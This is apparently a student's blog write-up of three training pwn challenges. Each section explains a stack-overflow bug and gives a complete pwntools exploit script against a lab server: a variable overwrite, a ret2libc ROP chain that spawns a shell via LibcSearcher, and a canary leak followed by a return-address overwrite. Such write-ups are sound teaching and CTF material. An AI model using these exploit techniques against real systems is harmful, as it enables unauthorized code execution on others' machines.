第一次实训wp

2020-12-22

字数统计: 972字 | 阅读时长≈ 4分

第一次实训PWNwp

这次三道题目都挺简单的

一、送分

直接拖IDA

程序很简单，只要把v5的值覆盖为100即可得到flag。

exp:

from pwn import *
#p=process("./songfen")
p=remote('10.102.32.142',28717)
sleep(1)
p.sendline('a'*0x1c+p32(100))
p.interactive()

二、rop1

首先查看程序保护机制：

仅仅NX是开启的。

直接拖IDA

程序逻辑很清楚，如果v5=2并且v6=1的话，那么就可以到达gets()函数，即程序漏洞处，之后就可以进行栈溢出。

v5是自己输入的值，v6是sub_401162的返回值。进入函数sub_401162()

发现该函数是为了向bss段里的某个变量赋值。如果赋值恰好都能验证通过，使v2=10，那么返回值就是1.(实际上加这一步仅仅是为了不让题目看起来太简单，实际还是没有新生赛pwn3有难度)

之后发现程序中没有system函数，需要使用Libcsearcher来进行库查找匹配。

所以exp为：

from pwn import *
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

p=remote('10.102.32.142',28566)
#p=process('./rop1')
elf=ELF('./rop1')

pop_rdi=0x40131b
ret=0x401016

p.recvuntil('choice:')#调用1，通过验证
p.sendline("1")
sleep(0.5)
p.sendline("nmlkjihgfe")

p.recvuntil('choice:')#调用2，溢出覆盖
p.sendline("2")
p.recvuntil("Congratulations!!")
payload='a'*0x58+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4011d9)
p.sendline(payload)

p.recvuntil('choice:')#调用非1非2，利用，最后调用main进行新一轮利用
p.sendline("3")
p.recvuntil('wrong choice.\n')
putadd=u64((p.recv(6).ljust(8,'\x00')))
print hex(putadd)

libc=LibcSearcher('puts',putadd)
libc_base=putadd-libc.dump('puts')
binsh=libc_base+libc.dump('str_bin_sh')
system=libc_base+libc.dump('system')

p.recvuntil('choice:')
p.sendline("1")
sleep(0.5)
p.sendline("nmlkjihgfe")

p.recvuntil('choice:')
p.sendline("2")
p.recvuntil("Congratulations!!")
payload1='a'*0x58+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload1)

p.recvuntil('choice:')
p.sendline("3")
p.interactive()

三、canary

首先查看保护机制：

之后拖IDA打开：

发现输入为1的话是可以往buf里输入0x100个字节的数据，存在溢出。

如果输入为2的话可以打印buf中的数据，遇0截止。

但是不可能直接进行溢出利用的，因为canary机制存在：

64位的canary机制,会在函数头部添加:
    mov    rax,QWORD PTR fs:0x28               //从fs:0x28寄存器中取一个值
    mov    QWORD PTR [rbp-0x8],rax             //写入当前栈帧底部(RBP前方第一个数)

结尾部分添加:
    mov    rcx,QWORD PTR [rbp-0x8]             //把canary值取出
    xor    rcx,QWORD PTR fs:0x28               //比较与寄存器中的是否一样
    je     xxxxx                               //函数正常退出
    call   0x400580 <__stack_chk_fail@plt>     //__stack_chk_fail()函数功能为报告栈损坏

当前函数栈帧为:
0040| 0x7fffffffe088 --> 0xf383d165ddc4a700    //Canary值
0048| 0x7fffffffe090 --> 0x7fffffffe4c0        //上个函数栈帧的RBP
0056| 0x7fffffffe098 --> 0x4007a1              //上个函数栈帧的RIP

canary的值是存在于[rbp-0x8]处，所以如果canary的值被修改了，就会导致程序崩溃。

所以需要先泄露canary的值。

buf与rbp距离为0x50，所以可以填入0x49个数据，把canary的值泄露，因为最后一位的\x00是为了截断某些打印函数而设置的，防止canary被打印，所以也需要覆盖。

调用2，再调用1即可。

exp:

from pwn import *
context.log_level='debug'
context.arch='amd64'

p=remote('10.102.32.142',28517)
#p=process('./stackoverflow')
elf=ELF('./stackoverflow')

pop_rdi=0x40132b
ret=0x401016

p.recvuntil('choice:')
p.sendline("1")
sleep(0.5)
p.sendline('a'*0x48)#sendline之后会有\n，所以是0x49个字节

p.recvuntil('choice:')
p.sendline("2")
p.recvuntil('a\n')
canary=u64(p.recv(7).rjust(8,'\x00'))

p.recvuntil('choice:')
p.sendline("1")
sleep(0.5)
p.sendline('a'*0x48+p64(canary)+'a'*8+p64(ret)+p64(0x401182))

p.recvuntil('choice:')
p.sendline("3")
p.interactive()

本文作者： 李小混
本文链接： https://lixiaohun.github.io/post/0.html
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！